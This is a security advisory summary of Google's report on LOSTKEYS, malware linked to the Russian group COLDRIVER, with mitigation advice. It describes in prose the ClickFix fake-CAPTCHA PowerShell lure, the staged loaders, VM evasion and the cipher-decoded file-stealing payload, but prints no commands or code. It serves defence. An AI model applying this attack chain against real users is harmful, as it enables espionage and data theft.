Summary:
Google’s Threat Intelligence Group has discovered a new malware strain named LOSTKEYS, linked to the Russian state-sponsored group COLDRIVER (also known as UNC4057, Star Blizzard, and Callisto). This malware is designed to exfiltrate files from targeted directories based on specific extensions, collect system information, and report running processes to the attacker. COLDRIVER is historically known for credential phishing campaigns targeting NGOs, NATO-affiliated individuals, journalists, and those connected to Ukraine, with the ultimate aim of intelligence collection supporting Russia’s strategic objectives. While the group’s primary tactic involves stealing credentials to access emails and contact lists, they have also deployed malware, including SPICA and now LOSTKEYS, for deeper system access in more sensitive operations.The LOSTKEYS infection chain starts with a lure website displaying a fake CAPTCHA, which, upon interaction, tricks the user into copying and running a PowerShell command—an example of the broader “ClickFix” social engineering tactic. The PowerShell script then pulls down a second-stage script from a hardcoded IP, which uses device resolution hashes to evade execution in virtual machines. If successful, it proceeds to a third stage that includes Base64-encoded PowerShell, retrieving two additional files: a Visual Basic decoder script and an encoded payload. These use a custom substitution cipher with unique keys for each infection chain to decode the final malware.


The final payload, LOSTKEYS, is a VBS file capable of exfiltrating documents from specific directories and sending system metadata and a list of running processes back to the command and control server. While COLDRIVER’s earlier malware, SPICA, served a similar purpose, LOSTKEYS appears to be more advanced and is only deployed in carefully selected operations, likely against high-value targets with strategic intelligence relevance. This aligns with COLDRIVER’s documented history of combining credential theft with targeted malware deployment to enhance access and persistence.


Security Officer Comments:
During their investigation, GTIG uncovered two additional LOSTKEYS samples dated December 2023. These older variants were distributed as Portable Executable (PE) files, disguised as legitimate tools such as the open-source intelligence platform Maltego. Though it’s unclear if these samples were directly tied to COLDRIVER at the time, they may represent an earlier version of the tool later refined and integrated into the group's active operations.


Suggested Corrections:
To mitigate the risk from groups like COLDRIVER, Google urges users, especially those likely to be targeted by state-backed actors to enroll in the Advanced Protection Program, enable Enhanced Safe Browsing in Chrome, and implement enterprise-level security controls that restrict end-user script execution and enforce least-privilege access. Organizations should also educate employees about social engineering tactics like ClickFix and closely monitor for unauthorized use of PowerShell, especially clipboard-based execution chains.

Link(s):
https://cloud.google.com/blog/topic...oldriver-steal-documents-western-targets-ngos